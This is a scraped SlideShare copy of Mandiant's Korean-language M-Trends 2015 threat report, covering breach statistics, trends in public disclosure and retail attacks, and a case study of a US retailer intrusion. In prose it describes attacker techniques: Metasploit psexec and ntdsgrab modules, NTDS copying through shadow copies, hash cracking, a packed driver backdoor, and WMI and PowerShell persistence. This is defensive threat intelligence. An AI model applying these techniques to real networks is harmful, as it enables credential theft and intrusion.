Successfully reported this slideshow.
We use your LinkedIn profile and activity data to personalize ads and to show you more relevant ads. You can change your ad preferences anytime.
위 협 보 고 서
최일선에서 본 관점
M-Trends
®
2015:
SECURITY
컨설팅
최일선에서 본 관점M-Trends
머리말	 . .  .  .  .  .  .  .  .  .  .  .  .  .  .  .  .  .  .  .  .  .  .  .  .  .  .  .  .  .  .  .  .  ...
www.mandiant.com 	 1
머리말
저희는 수년 간 완벽한 보안이란 존재하지 않는다고 주장해왔습니다.
그리고 2014년의 사건들은 모든 사라지지 않은 의심들을 잠재울겁니다.
저희가 조직들이 결함을 보완하여 보안...
3%
5%
Mandiant가 침입을 조사한 산업들
전에 저희 조사의 적은 부분을 차지했던 몇
가지 산업들이 주목을 받는 표적으로
부상했습니다.
비즈니스 및 전문 서비스
정부 및 국제 기구
의료
저희는 2014년에 몇 가...
205
전반적인 사이버 위협 환경
방해 데이터 절도 사이버 범죄 핵티비즘 파괴적 공격
목표 접근 및 확산 경제적, 정치적 이익 금전적 이득 비방, 언론 및 정책 운영 방해
예 봇넷 및 스팸
지능형 지속적
위협 그룹
신용...
4	 www.mandiant.com
최일선에서 본 관점M-Trends
트렌드 1:
공개할 것인가 말 것인가?
사이버 공격들은 그 어느 때보다도 조직들을 언론에 드러내고 있고, 어떤 피해자가 공개될
것인지에 대한 기대가 ...
www.mandiant.com 	 5
그들은 때때로 얼마나 많은 정보를 공유해야
하는지에 대한 어려운 결정을 해야 합니다(많은
사실들이 알려지지 않은 상태에서도).
대부분의 경우, 조직들은 루머들을 차단하기 위해
신속하...
6	 www.mandiant.com
최일선에서 본 관점M-Trends
효과적인 조사의
수행
다음은 언론, 투자자, 고객 또는 다른 사람들이 조직이 보안 사고를 대중에게
공개한 경우에 조직에게 묻는 몇 가지 주요 질문들입...
www.mandiant.com 	 7
4 U.S. Department of Homeland Security 및 U.S. Secret Service. “Backoff Malware: Infection Assessment(...
8	 www.mandiant.com
최일선에서 본 관점M-Trends
사례연구
한 공격자가 대규모의 미국 소매 기업을 침해하여, 3개월의 기간 동안
수백만 개의 신용카드를 손상시킨 방법
이 공격은 소매 기업들이 2014...
www.mandiant.com 	 9
리버스엔지니어 노력을 방해하고
백도어의 기능을 숨기는 것을
도와줍니다.
백도어는 압축을 풀은 드라이버를
사용자-공간 프로세스(윈도우즈 커널
외부에서 실행되는 프로세스)를 주입하는
능...
10	 www.mandiant.com
최일선에서 본 관점M-Trends
소매 체인 전체에
설치된 모든
금전등록기는 중앙
도메인 컨트롤러로
인증되었습니다.
이것은 소매 도메인
컨트롤러에 접속하는
모든 사람은 매장
금전등록...
www.mandiant.com 	 11
그림 3: 공격 요약
2 3
1 4
12	 www.mandiant.com
최일선에서 본 관점M-Trends
교훈 돈이 가는 곳에는 범죄자가 뒤를 따릅니다. 소매 기업들은 항상 금전적
동기가 있는 사이버 범죄자로부터 집중 표적이 되어왔습니다. 저희는 201...
www.mandiant.com 	 13
이것은 고양이와 쥐의 싸움과 같습니다. 보안팀이
새로운 방어 시스템을 설치하면 공격자들은 전술을
변경합니다. 이러한 싸움은 2014년에도
계속되었습니다. 저희는 VPN을 탈취하여
...
14	 www.mandiant.com
최일선에서 본 관점M-Trends
이러한 모든 사례에서, VPN 로그는 숨길 수 없는
증거의 출처였습니다. 공격의 표적이 된 인증된
사용자 세션의 소스 IP 주소는 신속하게 변경되고...
www.mandiant.com 	 15
언어(파워셸과 VBScript 포함)는 WMI를 사용하여
데이터를 수집하고, 저수준 OS 컴포넌트와
상호작용을 하고, 커맨드를 실행할 수 있습니다.
또한 WMI는 지정된 객체의 상...
16	 www.mandiant.com
최일선에서 본 관점M-Trends
그림 7: 위협 범죄자가 WMI를 사용하여 지속성을 유지하는 방법
2
3
1
SELECT * FROM __InstanceModificationEve...
www.mandiant.com 	 17
그림 8은 WMI 커맨드 라인 컨슈머를 작성하는
파워셸 신택스의 예를 보여주며, 이 컨슈머는
Base64 암호화 스트링을 인수로 사용하여
powershell.exe를 실행합니다. ...
18	 www.mandiant.com
최일선에서 본 관점M-Trends
LSA는 확장이 가능하기 때문에, 맞춤형 보안
패키지는 로그온할 때 사용자 인증을 처리하기
위해 사용할 수도 있습니다. 악성 보안 패키지는 이
능력...
www.mandiant.com 	 19
공격자는 복구된 환경을 재침해하여 도메인 관리자
권한을 즉시 회복할 수 있었습니다.
골든 티켓 공격을 완화하기 위한 유일한 방법은,
우선적으로 도메인 침해를 피할 수 없는 한,
커...
20	 www.mandiant.com
최일선에서 본 관점M-Trends
저희는 작년을 러시아 위협 범죄자들을 추적하며
발견한 공격을 조사하면서 보냈고, 그 과저에서
범죄 조직과 국가가 지원하는 범죄자를 구별하기
어려운 ...
www.mandiant.com 	 21
12 https://www.fireeye.com/blog/threat-research/2014/04/crimeware-or-apt-malwares-fifty-shades-of-gr...
22	 www.mandiant.com
최일선에서 본 관점M-Trends
이 그룹은 APT28과 동일한 종류의 피해자를
표적으로 삼는 것처럼 보였으나, 몇 가지 주요한
차이점이 있었습니다. 한 가지 예를 들면, 이
그룹은...
www.mandiant.com 	 23
사이버 보안은 대세가 되었으므로, 조직들은
데이터 침해를 새로운 관점(두려움과 수치심의
원천이 아닌 비즈니스 현실)에서 고려해야 합니다.
조직들은 보안 사고를 예측하고 자신감 있게...
24	 www.mandiant.com
최일선에서 본 관점M-Trends
Mandiant 소개
FireEye 계열사인 Mandiant는 모든 주요 산업에 속한 수백 개 고객들의 컴퓨터 네트워크와 사용자
단말로부터 위협 범...
Mandiant, a FireEye Company  |  02 559 0730  |  korea.info@FireEye.com  |  www.mandiant.com  |  www.fireeye.kr
© 2014 Fire...
M-Trends 2015: 최일선에서 본 관점
Upcoming SlideShare
Loading in …5
×

M-Trends 2015: 최일선에서 본 관점

2,342 views

Published on

이 연례 위협 보고서는 통찰력, 통계 및 사례연구를 사용하여 지능형 지속적 위협(APT) 공격자들의 툴과 전술이 어떻게 진화했는지를 보여줍니다.

Published in: Technology
  • Be the first to comment

  • Be the first to like this

M-Trends 2015: 최일선에서 본 관점

  1. 1. 위 협 보 고 서 최일선에서 본 관점 M-Trends ® 2015: SECURITY 컨설팅
  2. 2. 최일선에서 본 관점M-Trends 머리말 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 1 피해자와 관련된 수치. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 2 트렌드 1: 공개와의 싸움. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 4 사이버에 대한 알고 있는 대중 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 4 고조되는 기대. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 4 왜 공개가 증가합니까? . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 5 트렌드 2: 집중 표적이 된 소매 산업. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 7 엔트리포인트 역할을 하는 애플리케이션 가상화 서버. . . . . . . . . . . . . . . . . . . . . . . . . . 7 새로운 툴, 전술, 절차 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 7 칩 및 PIN 기술을 사용하는 분야에서 전자상거래 공격 증가. . . . . . . . . . . . . . . . . . . . . . 7 권장 사항. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 12 트렌드 3: 발전하는 공격 라이프사이클. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 13 VPN 탈취. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 13 악성코드를 잘 띄는 곳에 숨기기. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 14 손쉬운 패스워드 절도. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 18 WMI와 파워셸을 사용하여 내부로 이동 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 19 트렌드 4: 모호한 경계—사이버 범죄자와 APT 범죄자가 서로의 전술을 부분적으로 공유. . . . 20 불확실한 공격 의도를 평가하는 것은 복잡합니다. . . . . . . . . . . . . . . . . . . . . . . . . . . . 20 이러한 차이점이 중요합니까? . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 22 맺음말 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 23 Mandiant 소개. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 24 FireEye 소개 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 24 목차
  3. 3. www.mandiant.com 1 머리말 저희는 수년 간 완벽한 보안이란 존재하지 않는다고 주장해왔습니다. 그리고 2014년의 사건들은 모든 사라지지 않은 의심들을 잠재울겁니다. 저희가 조직들이 결함을 보완하여 보안을 강화하는 것을 관찰하는 동안에도 , 지능형(그리고 별로 지능형이 아닌) 위협 범죄자들은 계속 전술을 발전시켜 이를 뚫을 방법을 찾습니다. 작년 M-Trends 리포트에서, 저희는 사이버 보안의 우선순위가 단순 IT 이슈로부터 이사회의 주요 안건으로 옮겨간 것에 주목했습니다. 금년에는, 사이버 보안 (또는 아마도 보다 정확하게, 사이버 불안)이 대세가 되었습니다. 2015년의 첫 몇 주만 해도, 화제의 중심은 미국 대통령의 연두교서,1 고예산 영화의 구성,2 그리고 할리우드의 골든 글로브 상 방송의 개막 펀치라인이었습니다.3 ​맨디언트 컨설턴트들은 중대한 보안 사고시 최초 침해 대응을 맡기 때문에 우리는 공격자들의 동기와 전술이 어떻게 변화하고 있는지 누구보다 더 잘 이해 할 수 있는 위치에 있습니다. 이 보고서에 제시된 통찰력과 분석은 수백 건의 서비스에 참여하는 동안 얻은 저희의 통합된 경험의 산물입니다. 지난 10년 간, 저희는 전세계의 30여 개의 산업에 속한 고객들을 지원해 왔습니다. 조직들은 몇 가지 개선을 이뤄냈으나, 공격자들은 여전히 탐지되기 전에 침해된 환경에서 매우 오랫동안 무제한의 자유를 누렸으며, 이 러한 기간의 평균은 2014년에 205일이었고, 2013 년에 229일이었습니다. 이와 동시에, 이러한 침입을 자체적으로 발견하는 조직들의 숫자는 거의 변동되지 않았습니다. 69퍼센트는 법 집행 기관과 같은 외부 조직으로부터 침해에 대해 알게 되었습니다. 이 비율은 2013년의 67퍼센트, 그리고 2012년의 63퍼센트보다 증가했습니다. 소매 기업들은 공격자들이 POS 시스템에서 신용카드 번호를 훔치는 새로운 방법을 알아냄으로써 가장 빈번한 표적이 되었습니다. 칩 및 PIN 신용카드 보안을 채택한 분야에서, 저희는 지난 몇 년보다 전자상거래와 지불 처리 회사에 대한 더 많은 공격을 관찰했습니다. 지난 몇 년 간 저희 조사에서 비교적 작은 부분을 차지했던 다음과 같은 몇 개의 산업들은 주목을 받는 표적으로 부상했습니다: 비즈니스 및 전문 서비스, 의료, 정부 및 국제 기구. 보안팀이 새로운 방어 시스템을 설치함에 따라, 공격자들은 전술을 발전시키고 있습니다. 저희는 공격자들이 새로운 전술(또는 어떤 경우에는 과거에 사용했던 유효성이 증명된 기법을 강화한 전술)을 사용하여 가상 사설망(VPN) 보안을 탈취하고, 탐지를 회피하고, 인증을 훔치고, 침해된 환경에서 잠복을 지속하기 위한 거점을 유지함으로써, 작년에 이러한 능력들이 총력적으로 가동되는 것을 관찰했습니다. 또한 저희는 이전 어느 해보다도 더 많은 피해자들이 보안 사고를 대중에게 공개하는 것을 관찰했습니다. 이와 동시에, 피해자들은 침해가 발생한 후에 묻는 다음과 같은 첫 질문에 답변하느라고 힘든 시간을 보냈습니다: 누가 침해했습니까? 지극히 평범한 사이버 범죄자와 국가가 후원하는 지능형 공격자 사이의 경계가 모호해지고 있습니다. 전자는 더 정교해졌고, 후자는 움직임을 위장하기 위해 규격화된 툴을 사용했습니다. 종합적으로 말하면, 이러한 발전으로 인해 그 어느 때보다도 위협 환경이 복잡해졌습니다. 위협 범죄자를 방어, 탐지, 분석, 대응하는 보안팀의 역할이 더 힘들어졌거나, 또는 더 중요해졌습니다. 1 Michael D. Shear (The New York Times). “Obama to Announce Cybersecurity Plans in State of the Union Preview(연두교서 시사회에서 사이버 보안 계획을 발표한 오바마).” 2015년 1월 2 Sheri Linden (The Hollywood Reporter). “’Blackhat’: Film Review('블랙햇': 영화 평론).” 2015년 1월 3 Christopher Palmeri (Bloomberg). “Hollywood ‘Spoiled Brats’ Are Easy Targets at Golden Globes(골든 글로브에서 쉽게 표적이 된 할리우드 '버릇없는 아이들').” 2015년 1월
  4. 4. 3% 5% Mandiant가 침입을 조사한 산업들 전에 저희 조사의 적은 부분을 차지했던 몇 가지 산업들이 주목을 받는 표적으로 부상했습니다. 비즈니스 및 전문 서비스 정부 및 국제 기구 의료 저희는 2014년에 몇 가지 주요 산업에 속한 회사들에 대한 공격 숫자가 변동된 것에 주목했습니다. 소매―4%에서 14%로 증가 미디어 및 엔터테인먼트―13%에서 8%로 감소 17% 비즈니스 및 전문 서비스 6% 의료 5% 운송 3% 항공우주 및 국방 7% 법률 서비스 8% 기타 7% 하이테크 및 IT 8% 건설 및 엔지니어링 7% 정부 및 국제 기구 14% 소매 10% 금융 서비스 8% 미디어 및 엔터테인먼트 최일선에서 본 관점M-Trends 피해자와 관련된 ​숫자들 공격자들은 2014년에 광범위한 산업을 표적으로 삼았으며, 저희가 전에 많은 숫자를 관찰하지 못했던 몇 가지 산업이 포함됩니다. 조직들은 2013년 보다 더 빨리 침해에 대해 알게 되었으나, 공격자들은 여전히 침해된 환경에서 매우 오랫동안 탐지되지 않은 상태로 이동했습니다. 그리고 이러한 침입을 자체적으로 발견한 피해자들의 숫자는 감소했습니다. 2 www.mandiant.com
  5. 5. 205 전반적인 사이버 위협 환경 방해 데이터 절도 사이버 범죄 핵티비즘 파괴적 공격 목표 접근 및 확산 경제적, 정치적 이익 금전적 이득 비방, 언론 및 정책 운영 방해 예 봇넷 및 스팸 지능형 지속적 위협 그룹 신용카드 절도 웹사이트 훼손 데이터 삭제 표적 특성 보통 자동화 지속적 자주 기회주의적 과시 분쟁 주도 사이버 위협 범죄자들은 계속 증가하는 다수의 경제 및 정치 목표를 공격하기 위해 네트워크를 사용하고 있습니다. 침해가 탐지되고 있는 방법 31% 피해자가 침해를 내부적으로 발견한 비율 69% 피해자가 외부 조직으로부터 통지를 받은 비율 침해의 최초 증거를 관찰한 후 침해를 발견할 때까지 걸리는 기간 위협 그룹이 피해자 네트워크에서 발견되기 전까지 상주한 일수의 평균치 2013년보다 24일 감소 최장 상주 기간: 2,982일 APT 피싱 관찰된 피싱 이메일 중에서 IT 또는 보안이 관련된 비율로서, 종종 표적 기업의 IT 부서로 가장하려고 시도 78% 의 피싱 이메일은 평일에 보냈습니다 72% 월 화 수 목 금 토 일 www.mandiant.com 3
  6. 6. 4 www.mandiant.com 최일선에서 본 관점M-Trends 트렌드 1: 공개할 것인가 말 것인가? 사이버 공격들은 그 어느 때보다도 조직들을 언론에 드러내고 있고, 어떤 피해자가 공개될 것인지에 대한 기대가 고조되고 있습니다 . 저희가 2014년에 지원한 회사의 대표적인 30개의 조직들은 자사의 데이터 침해를 공식적으로 공개했고, 이로인해 뉴스등에서 원치않는 집중 조명을 받았습니다. 저희의 경험에 의하면, 공개전에 침해의 범위와 정도를 파악하고 사실 정보를 제공하면 조직들이 보안 사고를 공개할 때 명확하고 자신감있는 메시지를 작성하는 데 도움이 될 수 있습니다. 조직들은 침해를 공개함으로써 과거의 발표를 정정 및 제한할 필요가 없고, 이 과정에서 신뢰성을 잃는 것을 피할 수 있습니다. 사이버에 대해 잘 알고 있는 대중 2014년에 일련의 침해가 끊임없이 공개됨으로써 대중들 사이에 위협 및 표적 공격의 영향에 대한 인식이 증가했습니다. 그 결과, 대중은 침해가 공개될 때 더 상세하고 정보에 근거한 질문을 합니다. 언론, 파트너, 투자가, 소비자들은 더 이상 언제 사고가 발생했고 어떤 데이터가 노출되었는지를 아는 것만으로 만족하지 않습니다. 그들은 사용된 악성코드의 종류, 공격자들이 접속을 유지한 방법과 같은 모든 내용을 상세히 알기를 원합니다. 또한 피해자들은 공격의 배후에 누가 있는지 공개하라는 압력을 점점 더 많이 받고 있습니다. 저희는 침해의 증거를 수집하기 시작한 시점에서 피해자들로부터 사이버 공격을 특정한 위협 범죄자의 소행임을 확인해 달라는 요청을 자주 받습니다. 같은 이유로, 다양한 유형의 범죄자들이 동일한 툴을 더 많이 공유하기 때문에 주범을 찾는 것이 점점 더 복잡해지고 있습니다(20페이지의 트렌드 4: 모호한 경계—사이버 범죄자와 APT 범죄자가 서로의 전술을 부분적으로 공유 참조). 고조되는 기대 침해에 대해 무엇이 공개될 것인지에 대한 기대가 고조되면서, 피해자 조직들은 주요 침해가 발생한 후에 강력하고 일관성있는 커뮤니케이션이 얼마나 중요한지를 이해하기 시작했습니다. 더 많은 조직들이 대중에게 침해를 공개하고 있으므로, 커뮤니케이션 전략을 세울 때는 침해의 범위와 정도를 이해하는 것이 매우 중요합니다. 그러면 회사들이 과거의 발표를 정정 및 제한할 필요가 없고, 그 과정에서 신뢰성을 상실하는 것을 피할 수 있습니다.
  7. 7. www.mandiant.com 5 그들은 때때로 얼마나 많은 정보를 공유해야 하는지에 대한 어려운 결정을 해야 합니다(많은 사실들이 알려지지 않은 상태에서도). 대부분의 경우, 조직들은 루머들을 차단하기 위해 신속하게 조치를 취해야 합니다. 예를 들면, 저희는 공격자가 어떻게 침입했는지에 대한 대중의 추측이 사실이 아니라는 것을 입증하기 위해 정신없이 뛰어다니는 상황을 목격했습니다(조사자들이 계속 사고조사를 진행하는 동안에도). 이러한 경우, 조사자들은 사고에 대한 여러 가지 억측을 부인해달라는 요청을 받기 때문에 사실을 파악하고 추적하는 조사의 주요 목표에 집중할 수 없습니다. 왜 공개가 증가합니까? 저희가 자주 받는 한 가지 질문은 더 많은 회사들이 침해를 공개하는 이유입니다. 저희가 이 질문에 명확하게 답변할 수는 없으나, 2가지 요인이 도움이 될 수 있습니다. 첫째, 지난 몇 년과 비교할 때, 저희는 카드 소유자 데이터 또는 개인 신원 확인 정보가 노출된 사고에 더 많이 대응했습니다. 대부분의 경우, 침해된 조직은 법률에 따라 사고와 관련된 특정한 사실들을 공개해야 합니다. 또한, 저희가 2014년에 수행한 조사 중에서 69퍼센트의 피해자들은 자체적으로 공격자를 탐지하지 않았습니다. 그들은 공급자, 고객 또는 법 집행 기관과 같은 제3자로부터 침해를 당했다는 것을 알게 되었습니다. 이 통계를 적용하는 또 하나의 방법이 있습니다. 어떤 조직이 피해자라는 것을 알고 있는 경우, 공격자뿐만 아니라 다른 사람들도 그 사고에 대해 알고 있다고 가정할 수 있습니다. 어떤 조직이 침해를 대중에게 공개하는 것 여부에 상관없이, 주요 이해관계자는 항상 즉시 답변을 받기를 원하지만, 조사자들은 증거를 찾는 데 몇 주 또는 몇 개월이 걸릴 수 있으므로, 사실들은 시간이 지나야 밝혀진다는 것을 이해하는 것이 중요합니다. 이것이 기업 커뮤니케이션 전략을 세울 때 침해의 범위와 정도를 이해하는 것이 매우 중요한 이유입니다. 교훈 점점 더 많은 피해자들이 대중에게 침해를 공개하고 언론의 집중 조명을 받고 있습니다. 언론, 고객, 파트너들은 보안 침해가 불가피하다는 것을 깨닫고 있습니다. 그러나, 이와 동시에, 피해자들은 더 많은 정보를 요구하고 있고, 더 상세한 질문을 합니다. 이에 대비하려면, 조직들은 효과적인 커뮤니케이션 전략을 세워야 합니다. 최선의 전략을 세우려면 보안 사고에 대한 철저한 조사에 의해 밝혀진 사실들에 근거한 정보를 반영해야 합니다.
  8. 8. 6 www.mandiant.com 최일선에서 본 관점M-Trends 효과적인 조사의 수행 다음은 언론, 투자자, 고객 또는 다른 사람들이 조직이 보안 사고를 대중에게 공개한 경우에 조직에게 묻는 몇 가지 주요 질문들입니다. 회사의 모든 이해 관계자들은 대중에게 발표할 때 부정확하고 일관성이 없는 메시지를 작성하는 것을 피하기 위해 다음의 질문들에 대한 답변을 이해해야 합니다. 공격자는 어떻게 네트워크 환경에 접속했습니까? 공격자들은 보통 사회 공학과 패치가 제공되지 않은 (또는 알려지지 않은) 취약점의 조합을 통해서 접속합니다. 또한 웹서버를 이용할 수도 있습니다. 그들은 악성 첨부 파일을 보내고, 그 파일을 열도록 유인합니다. 그들은 많은 사람들이 이용하는 웹사이트를 감염시킬 수도 있습니다. 초기 접속이 발생한 방법을 설명할 준비를 하는 것이 중요합니다. 그러나 더욱 중요한 것은 접속이 차단되었고 위협이 격리되었는지 여부를 확인하는 것입니다. 공격자는 어떻게 네트워크 환경에 대한 접속을 지속적으로 유지했습니까? 공격자들은 보통 네트워크 환경에 대한 지속적인 접속이 필요합니다. 이러한 접속을 막기 위해서는 연결을 유지하기 위해 사용하고 있는 모든 경로를 탐색해야 합니다. 일반적으로 사용되는 경로에는 백도어, 웹셸, VPN에 대한 접속, 그리고 다른 원격 접속 시스템들이 포함됩니다. 공격 방법은 무엇입니까? 공격자가 데이터에 접속하여 훔치는 방법을 알아보는 것은 미래에 발생하는 동일한 유형의 공격을 방어하기 위한 중요한 단계입니다. 침해의 정도를 정확하게 조사하지 않으면 사고의 영향을 판단하거나 사고를 복구하기가 어렵습니다. 네트워크 환경에서 어떤 데이터가 도난되었습니까? 공격자들이 보통 어떤 데이터를 훔치는지를 알아보기 위해서는 침해된 시스템에 대한 포렌식 분석을 수행해야 합니다. 때로는 포렌식 분석이 이 질문에 대한 완전한 답변을 제공하지 못할 수도 있습니다. 항상 법무팀과 협력하여 도난되었거나 도난되었을 가능성이 있는 데이터의 종류에 따라 어떤 법적 책임이 발생할 수 있는지 알아보십시오. 보안 사고를 격리했습니까? 앞의 4가지 질문에 답변할 수 있으면 보통 이 질문에 답변할 가능성이 높습니다. 현재의 위협에 대한 라이프사이클을 이해함으로써, 공격에 더 잘 대응하고, 공격 피해에 대한 복구를 시작할 수 있습니다.
  9. 9. www.mandiant.com 7 4 U.S. Department of Homeland Security 및 U.S. Secret Service. “Backoff Malware: Infection Assessment(악성코드 퇴치: 감염 평가).” 2014년 8월. 트렌드 2: 집중 표적이 된 소매 산업 소매 기업들은 2014년에 1,000여 개의 사업체가 공격을 받아 수많은 쇼핑객들 의 신용카드를 교체하게 한 침해를 당한 후에 대중의 주목을 받았습니다.4 소매 산업에 집중된 엄청난 양의 공격에 대한 저희의 조사는 이 위기에 몰린 산업을 표적으로 삼기 위해 사용된 새로운 공격 그룹, 툴셋, 기법을 밝혀내었습니다. 엔트리포인트 역할을 하는 애플리케이션 가상화 서버 애플리케이션 가상화 기술을 사용하면 사용자들은 특정 프로그램들에는 접속이 제한된 원격지의 분리된 데스크탑 환경에 연결할 수 있습니다. 이 접근방법은 적절히 설정하는 경우, 사용자를 가상 환경 내에 안전하게 가두는 일종의 보호 버블을 만듭니다. 그러나, 어떤 경우에는, 사소한 설정 오류만 있어도 버블에 결함을 남깁니다. 공격자들은 이 가상 환경을 회피하여 시스템의 다른 부분으로 이동합니다. 저희가 조사한 이 공격 경로가 포함된 모든 사례에서 이와 동일한 주요 보안 결함을 관찰했으며, 이것은 사용자 이름과 패스워드만으로도 원격 접속이 가능한 애플리케이션이었습니다. 이중 인증을 했다면 이 공격 경로를 제어하는 데 도움이 되었을 것입니다. 새로운 툴, 전술, 절차 새로운 공격 그룹은 새로운 툴, 전술, 절차를 개발했습니다. 그들의 능력에는 모든 범위가 포함됩니다.저희는 공개적으로 제공되는 툴을 사용한 초보 공격자에서부터 특정한 POS 애플리케이션에 맞춤화된 정교한 카드 수집 악성코드를 사용하는 보다 발전한 그룹에 이르기까지 모든 공격자들을 관찰했습니다. 초보 공격 그룹은 기술이 있거나 없는 것에 상관없이 더 지능적인 그룹들만큼 효과적으로 카드 소유자 데이터를 훔칠 수 있다는 것을 보여주었습니다. 각 공격 그룹은 피해자의 환경에서 탐지되지 않게 이동하고 POS 시스템에 접속하여 카드 수집 악성코드를 설치했습니다. 칩 및 PIN 기술을 사용하는 분야에서 전자상거래 공격 증가 칩 및 PIN 인증이라고도 하는 유로페이, 마스터카드, 비자(EMV) 기술은 마침내 미국으로 전파되고 있습니다. (이 수십 년 된 글로벌 표준은 많은 지역에서 광범위하게 채택되었으나, 미국 소매 기업들에게는 늦게 인기를 얻었습니다.) EMV 활성화 신용카드는 각 거래에 대해 고유한 코드를 생성하여, 위조가 훨씬 더 어려워집니다. 따라서 사이버 범죄자들이 보다 취약한 표적으로 이동했을 수도 있습니다. 저희는 EMV 기술을 채택한 국가들에서 전자상거래 회사 및 지불 처리 회사에 대해 과거보다 더 많은 침해에 대응했습니다.
  10. 10. 8 www.mandiant.com 최일선에서 본 관점M-Trends 사례연구 한 공격자가 대규모의 미국 소매 기업을 침해하여, 3개월의 기간 동안 수백만 개의 신용카드를 손상시킨 방법 이 공격은 소매 기업들이 2014년 내내 관찰한 다음과 같은 침해 방법을 되풀이합니다: 유효한 인증을 사용하여 피해자의 시스템에 원격으로 접속하고, 그 인증을 사용하여 피해자의 네트워크에서 내부로 이동하여, 매장 금전등록기에 POS 악성코드를 설치하는 방식입니다. 이 소매 기업은 미국 당국이 통보를 한 후에야 비로소 네트워크 환경이 지속적으로 침해되었다는 것을 알게 되었습니다. 초기 침해 지점 이 공격자는 합법적인 인증을 사용하여 소매 기업의 가상화 애플리케이션 서버로 연결했습니다. 이 애플리케이션 서버는 공격자에게 제한된 권한을 가진 가상화 데스크탑을 제공했습니다. 저희는 실패한 로그인 시도를 찾지 못했으며, 이것은 공격자가 공격을 하기 전에 계정 인증을 입수했다는 것을 나타냅니다. (공격자가 이러한 인증을 입수한 방법은 저희에게 제공된 증거만으로는 검토한 결과가 명확하지 않습니다.) 그 다음에, 공격자는 가상화 데스크탑에서 발생한 사소한 설정 오류를 이용하여 시스템 권한을 증가시키고, 시스템을 직접 제어하는 커맨드 라인에 접속합니다. 공격자는 윈도우즈 FTP를 사용하여 패스워드 복사 툴을 다운로드했습니다. 공격자는 이 툴을 사용하여 로컬 관리자 계정에 사용하는 패스워드를 얻었습니다. 이 패스워드는 소매 기업의 환경에 설치된 모든 시스템에서 동일하게 사용되었습니다. 이러한 모든 과정은 겨우 몇 분만에 완료되었습니다. 내부 이동 공격자는 공격의 모든 단계에서 메타스플로잇 프레임워크를 사용하여 환경 전체에서 내부 이동을 했습니다. 메타스플로잇(익스플로잇 코드를 개발, 시험, 실행하기 위해 사용하는 오픈 소스 공격 프레임워크)은 공격자들이 표적 시스템에서 취약점을 찾고 악용하는 것을 돕는 수많은 모듈을 보유하고 있습니다. 이러한 다양성은 보안 연구자와 사이버 범죄자가 모두 선호합니다. 이 사례에서 사용된 메타스플로잇 모듈은 psexec_command이었고, 이 모듈을 사용하면 공격자가 침해된 시스템에서 명령을 실행할 수 있습니다. 이 모듈은 윈도우즈 서비스로서 명령을 실행합니다. 또한 윈도우즈 시스템-이벤트 로그에 다수의 포렌식 아티팩트를 남겨둡니다. 공격자는 침해된 시스템에 계속 접속하는 한편, 회사 환경에 서비스를 제공하는 도메인 컨트롤러에 초점을 맞추었습니다. 도메인 컨트롤러는 윈도우즈 환경에서 인증을 관리하는 서버입니다. 도메인 컨트롤러는 공격자가 입수한 로컬 관리자 인증을 공유했고, 손쉬운 표적으로 삼았습니다. 그 다음에, 공격자는 메타스플로잇 ntdsgrab 모듈을 사용하여 NTDS 데이터베이스와 시스템 레지스트리 하이브의 사본을 입수했습니다. NTDS 데이터베이스는 도메인 컨트롤러가 사용하는 액티브 디렉토리 정보를 저장하며, 이러한 정보에는 사용자 이름과 패스워드 해시가 포함됩니다. ntdsgrab 모듈은 볼륨 섀도 복사본 서비스(VSS)를 사용하여 NTDS 데이터베이스를 보유하고 있는 파티션에 대한 섀도 복사본을 작성합니다. VSS는 합법적인 백업과 복구 기능을 수행하는 시스템에 대한 스냅샷을 작성합니다 . 이 사례에서는 공격자가 VSS를 사용하여 NTDS 데이터베이스의 복사본을 작성했습니다. 그 다음에, 공격자는 그 복사본을 사용하여 다른 툴들을 통해서 패스워드 해시를 추출할 수 있었습니다. 공격자는 도메인 관리자 패스워드 해시를 크래킹한 후에 그것을 사용하여 환경 전체에서 내부 이동을 했습니다. 이 시점에서, 공격자는 메타스플로잇에서 기존의 내부 이동 기법(비대화형 네트워크 로그온, 마이크로소프트의 SysInternals PsExec 툴, 원격 데스크탑 프로토콜(RDP) 등)으로 전환했습니다. 공격자는 도메인 관리자 계정을 사용하여 가상화 애플리케이션 서버로 로그인한 후에 RDP를 통해서 시스템으로 로그인하여 더 많은 접속을 할 수 있었습니다. 백도어 공격자는 침해된 환경에서 거점을 유지하기 위해 몇 개의 컴퓨터에 백도어를 설치했습니다. 백도어는 윈도우즈 XP 시스템을 표적으로 한 악성 장치 드라이버였습니다. 이 악성코드는 지능형이지만 광범위하게 제공되는 악성코드에서 찾아볼 수 있는 것과 유사한 매우 정교한 패커를 사용하여 압축되었습니다. 장치 드라이버는 먼저 메모리에서 자체적으로 압축을 해제하고 새로운 시스템 스레드를 시작합니다. 그 다음에, 원래 드라이버는 시스템에 로드에 실패했다는 경보를 보냅니다. 압축을 해제한 코드는 원래 드라이버와 분리된 프로세스에서 실행되기 때문에, 악성코드는 윈도우즈가 드라이버가 로드 중이라는 것을 인식하지 않더라도 실행됩니다. 이러한 기법은
